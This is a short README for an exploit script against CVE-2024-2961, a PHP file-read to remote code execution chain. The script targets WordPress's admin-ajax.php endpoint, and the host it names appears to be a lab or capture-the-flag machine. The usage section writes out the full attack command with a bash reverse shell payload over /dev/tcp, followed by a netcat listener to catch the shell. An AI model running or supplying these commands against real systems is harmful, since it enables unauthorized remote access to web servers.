Skip to content

Latest commit

 

History

History
20 lines (13 loc) · 508 Bytes

README.md

File metadata and controls

20 lines (13 loc) · 508 Bytes

PHP file-read to RCE (CVE-2024-2961)

TODO Parse LIBC to know if patched

INFORMATIONS

To use, implement the Remote class, which tells the exploit how to send the payload.

This exploit script targets the admin-ajax.php endpoint on WordPress to achieve remote code execution.

Usage

python3 cnext-exploit.py 'http://blog.bigbang.com/wp-admin/admin-ajax.php' 'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'

Set up a listener to catch the reverse shell:

nc -lvnp port